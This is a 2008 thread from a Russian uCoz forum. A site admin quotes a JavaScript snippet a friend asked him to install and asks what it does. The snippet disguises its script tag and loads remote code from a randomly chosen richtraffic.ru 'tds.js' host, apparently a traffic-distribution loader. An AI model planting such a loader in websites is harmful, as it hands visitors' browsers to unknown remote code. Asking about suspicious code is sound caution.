Кодировка HTML | Демо-сайт CMS uCoz | Почта

Вопросик по скрипту.

Здесь задаём вопросы и получаем ответы по системе uCoz!
Правила форума
1. Темы с названиями Помогите, Как сделать, Хелп, Не могу найти и так далее будут перенесении в мусорку без предупреждения!
2. Любой транс-лит будет удален, так что подумайте стоит ли писать транс-литом.
3. Темы не по тематике этого раздела будут также перенесены в мусорку. (Например по DLE, phpBB, php скриптам и так далее...)
4. Не забываем про Общие правила форума!

Вопросик по скрипту.

Сообщение knk » 29 ноя 2008, 20:39

значит, один мой друг просит меня чтоб я се на сайт поставил этот скрипт..
но обьяснить толком что он делает и для чего это ему собстна здалось неможет или темнит чтото..
короче толковый народ кто развирается в джава , можите разобрать суть скрипта, что он делает и написать мне?
Код: Выделить всё
<script language="JavaScript">
var html = '';
html += '<scr' + 'ipt language="JavaScript" ';
html += 'src="http://disp-' + Math.round(1 + Math.random() * 4);
html += '.richtraffic.ru/tds.js"></scr' + 'ipt>';
document.write(html);
</script>
Главный админ портала --- ProZona.net.ru ---
скачать лучшие игры и софт, смотреть новинки фильмов онлайн, играть в флеш игры онлайн и еще много интересного!
Аватара пользователя
knk
Салага
Салага
 
Автор темы
Сообщения: 2
Зарегистрирован: 12 июн 2008, 00:24
Карма: + 0 -

Re: Вопросик по скрипту.

Сообщение BeaT 4 » 29 ноя 2008, 20:44

А куда ставить он тебе не говорил... :?: :D
Аватара пользователя
BeaT 4
Генерал-майор
Генерал-майор
 
Сообщения: 622
Возраст: 28
Зарегистрирован: 13 сен 2008, 21:26
Карма: + 3 -
Откуда: от верблюда

Re: Вопросик по скрипту.

Сообщение knk » 29 ноя 2008, 20:45

все разобрался, присмотрелся поподробней и сам все понял.. ладно, спосибо всеравно.
*можте закрывать
Главный админ портала --- ProZona.net.ru ---
скачать лучшие игры и софт, смотреть новинки фильмов онлайн, играть в флеш игры онлайн и еще много интересного!
Аватара пользователя
knk
Салага
Салага
 
Автор темы
Сообщения: 2
Зарегистрирован: 12 июн 2008, 00:24
Карма: + 0 -

Re: Вопросик по скрипту.

Сообщение BeaT 4 » 29 ноя 2008, 20:46

Какаято рандомная инфа...
Аватара пользователя
BeaT 4
Генерал-майор
Генерал-майор
 
Сообщения: 622
Возраст: 28
Зарегистрирован: 13 сен 2008, 21:26
Карма: + 3 -
Откуда: от верблюда


Вернуться в Общение

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 1

cron